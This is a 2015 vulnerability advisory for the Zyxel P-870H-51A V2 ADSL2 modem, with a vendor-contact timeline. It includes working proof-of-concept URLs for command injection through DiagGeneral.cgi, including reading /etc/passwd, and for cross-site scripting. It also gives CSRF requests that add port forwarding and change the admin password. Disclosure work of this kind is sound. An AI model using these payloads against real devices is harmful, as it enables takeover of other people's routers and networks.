This is a vulnerability report for Zyxel P-870H-51A V2 ADSL2 modem (multiple vulnerabilities).
Technical specifications
- Product: Zyxel P-870H-51A V2
- Firmware: 1.01(AWZ.4)
- Vulnerability type: cross-site request forgery, cross-site scripting, command injectio
Disclosure timeline
- 6th May 2014 - Contacted vendor (never received reply)
- 28th May 2014 - Contacted NSCS-FI
- 11th August 2014 - Received reply from NSCS-FI. They had contacted vendor. The vendor had replied, that the product is no longer supported - asked to make sure that the firmware was updated.
- 12th January 2015 - Public disclosure
Remote Command Execution
Requires that the user is logged in. Output is shown. Can be exploited remotely as CSRF vulnerability (however, the attacker does not receive the output).
http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20cat%20/etc/passwd&diagTestType=1
Since the default shell of the Linux distribution is very limited, it may be handy to run commands via sh:
http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20sh%20-c%20ifconfig%20-a&diagTestType=1
Cross-site scripting
http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi';alert('xss');//&diagTestType=1
Cross-site request forgery
Can do many actions, such as add port forwarding rules to internal network. Just redirect the victim to following URL:
http://192.168.1.1/portForwarding.cmd?action=add&enableNAT=TRUE&srvName=asdf&dstWanIf=ptm0_1&srvAddr=192.168.1.123&wanIp=&proto=1,&eStart=1234,&eEnd=1234,&iStart=1234,&iEnd=1234,
Requests that trigger “change password” and “reboot” require sessionKey-parameter and thus cannot be forged. Wait, let’s see again. The device contains a non-standard Unix passwd command - which does not require the “current” password:
> passwd
Usage: passwd <supervisor|admin|user> <password>
passwd --help
>
Hence, by combining this CSRF vulnerability and RCE, the attacker can remotely change the admin password:
http://192.168.1.1/DiagGeneral.cgi?diagAddr=google.fi;%20passwd%20admin%20newpasswd